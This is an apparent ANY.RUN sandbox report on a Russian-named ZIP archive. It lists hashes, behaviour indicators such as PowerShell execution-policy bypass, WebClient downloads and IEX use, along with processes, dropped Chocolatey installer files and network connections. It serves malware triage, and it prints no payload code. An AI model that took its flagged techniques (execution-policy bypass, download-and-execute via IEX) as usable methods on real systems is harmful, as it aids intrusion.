File name:

Новая сжатая ZIP-папка.zip

Full analysis: https://app.any.run/tasks/89bf32af-7242-4a9f-ae89-59107c17c8d3
Verdict: Malicious activity
Analysis date: November 08, 2024, 21:40:14
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
arch-doc
arch-exec
arch-scr
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

4E3C574EF3DE68021062D5F22564A859

SHA1:

80C7D4A351EDC915FF585FA10860ABF2CA6CBEC0

SHA256:

DC334DF203CF3CC22AD64C2A389039029B20A8825AC8EFC537984D8EB6C24D86

SSDEEP:

24:9AjhiYV4ysYT9u6GFNVBgLHgzABrQli/uoSM3NHJVhEupaRyakjhm:9ShXsdBwLHgEBrQJoT3BJVhEiICm

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 5852)
      • powershell.exe (PID: 6100)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 6316)
      • cmd.exe (PID: 3156)

  • SUSPICIOUS

    • Generic archive extractor

      • WinRAR.exe (PID: 6436)

    • Probably download files using WebClient

      • cmd.exe (PID: 6316)
      • cmd.exe (PID: 3156)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 6384)
      • cmd.exe (PID: 1500)
      • cmd.exe (PID: 1028)

    • Application launched itself

      • cmd.exe (PID: 6384)
      • cmd.exe (PID: 1500)
      • cmd.exe (PID: 1028)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6316)
      • cmd.exe (PID: 3156)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 6316)
      • cmd.exe (PID: 3156)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 5852)

    • The process executes Powershell scripts

      • cmd.exe (PID: 6316)
      • cmd.exe (PID: 3156)

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 6316)
      • cmd.exe (PID: 3156)

    • Drops 7-zip archiver for unpacking

      • powershell.exe (PID: 5852)

  • INFO

    • Manual execution by a user

      • notepad.exe (PID: 1452)
      • cmd.exe (PID: 6384)
      • notepad.exe (PID: 1576)
      • cmd.exe (PID: 1028)
      • cmd.exe (PID: 1500)
      • notepad.exe (PID: 1184)

    • The process uses the downloaded file

      • WinRAR.exe (PID: 6436)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2024:11:09 00:04:14
ZipCRC: 0xbbadf48f
ZipCompressedSize: 609
ZipUncompressedSize: 1157
ZipFileName: ????⮢?? ???㬥?? (3).txt
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
160
Monitored processes
25
Malicious processes
0
Suspicious processes
5

Behavior graph

Click at the process to see the details
start winrar.exe no specs notepad.exe no specs sppextcomobj.exe no specs slui.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs notepad.exe no specs powershell.exe setx.exe no specs setx.exe no specs powershell.exe no specs slui.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe notepad.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1028"C:\WINDOWS\System32\cmd.exe" /C "C:\Users\admin\Desktop\1.cmd" C:\Windows\System32\cmd.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
1184"C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\2.txtC:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
1452"C:\WINDOWS\System32\NOTEPAD.EXE" C:\Users\admin\Desktop\1.batC:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
1500C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\1.cmd" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
1576"C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\2.txtC:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
2784powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
3221225786
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
2808C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
3004"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
3076\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3156cmd.exe C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
3221225786
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\wldp.dll
Total events
27 532
Read events
27 512
Write events
19
Delete events
1

Modification events

(PID) Process:(6436) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\GoogleChromeEnterpriseBundle64.zip
(PID) Process:(6436) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\Новая сжатая ZIP-папка.zip
(PID) Process:(6436) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(6436) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(6436) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(6436) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(6436) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\MainWin
Operation:writeName:Placement
Value:
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF3D0000002D000000FD03000016020000
(PID) Process:(6436) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths
Operation:writeName:name
Value:
256
(PID) Process:(6436) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(6436) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths
Operation:writeName:psize
Value:
80
Executable files
7
Suspicious files
3
Text files
77
Unknown types
0

Dropped files

PID
Process
Filename
Type
5852powershell.exeC:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\chocolatey.zipcompressed
MD5:95231E41829F1C3A5AE890B71BCEF1FA
SHA256:C73D4EDA9AB5CA89583EF90838C4B819A304C9AC5A8AD5A89DCB7EDB15AB5FCF
5852powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_53ye1hlw.w4l.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5852powershell.exeC:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\chocolatey.nuspecxml
MD5:6F1D1A607FCF498C306BA60F4C49E0BB
SHA256:A2B9463494ED831C3A388C1867043FDA6D7B308125F1CE33E52C914DE5D35B99
6436WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa6436.33674\2.txttext
MD5:AFE5B37A2AA5EE699527A11C3C0F52CF
SHA256:B8265B3236DFAF023570313B8238C42C44A6FDE488AEF539932C86CB82CBF63A
5852powershell.exeC:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\_rels\.relsxml
MD5:BB9B566B51B59EF054CBC0D22DF193C4
SHA256:DDDB65206BB1DE00C7EC48740C10C2ABC0B440F22C49FB1FD74AFEDA0D095528
5852powershell.exeC:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\VERIFICATION.txttext
MD5:F5BA42804D762840BBDA4CB2AE6824E7
SHA256:75595E484E5BC5283398D878E882A234E4F0C1556FA5D41E8770336881E1C4FE
5852powershell.exeC:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateysetup.psm1text
MD5:77102E5869DBEED024C2C95A697DC94B
SHA256:D8E4B60FE7C256BE2D50DBBAF9F4837C738E1844CD17198614CA7CF26176717A
5852powershell.exeC:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall.ps1text
MD5:DB89FC7120818885D1A1E112AC7BE6C1
SHA256:C46903CFED1D74620630D0653CE057B3079AF5789AFEB1A5F884298A8693B4EC
5852powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pqqyxn4d.1wx.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5852powershell.exeC:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\choco.exe.manifestxml
MD5:1B3ED984F60915F976B02BE949E212CB
SHA256:D715D6071E5CDD6447D46ED8E903B9B3AD5952ACC7394EE17593D87A546C17FC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
55
DNS requests
25
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1552
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
4360
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
6944
svchost.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
3772
SIHClient.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
3772
SIHClient.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6516
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
6944
svchost.exe
GET
200
23.48.23.177:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
6944
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1248
RUXIMICS.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5488
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4360
SearchApp.exe
92.123.104.32:443
www.bing.com
Akamai International B.V.
DE
whitelisted
4360
SearchApp.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
4
System
192.168.100.255:138
whitelisted
1552
svchost.exe
20.190.160.22:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1552
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
4360
SearchApp.exe
92.123.104.63:443
th.bing.com
Akamai International B.V.
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
  • 20.73.194.208
whitelisted
www.bing.com
  • 92.123.104.32
  • 92.123.104.38
  • 92.123.104.34
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
google.com
  • 142.250.186.46
whitelisted
login.live.com
  • 20.190.160.22
  • 40.126.32.138
  • 40.126.32.133
  • 40.126.32.76
  • 40.126.32.136
  • 20.190.160.17
  • 40.126.32.140
  • 40.126.32.68
whitelisted
th.bing.com
  • 92.123.104.63
  • 92.123.104.38
  • 92.123.104.62
  • 92.123.104.33
  • 92.123.104.28
  • 92.123.104.34
  • 92.123.104.32
whitelisted
go.microsoft.com
  • 23.213.166.81
whitelisted
crl.microsoft.com
  • 23.48.23.177
  • 23.48.23.164
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 23.52.120.96
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted

Threats

PID
Process
Class
Message
5852
powershell.exe
Potentially Bad Traffic
ET INFO Observed Chocolatey Windows Package Management Domain (chocolatey .org in TLS SNI)
6100
powershell.exe
Potentially Bad Traffic
ET INFO Observed Chocolatey Windows Package Management Domain (chocolatey .org in TLS SNI)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Новая сжатая ZIP-папка.zip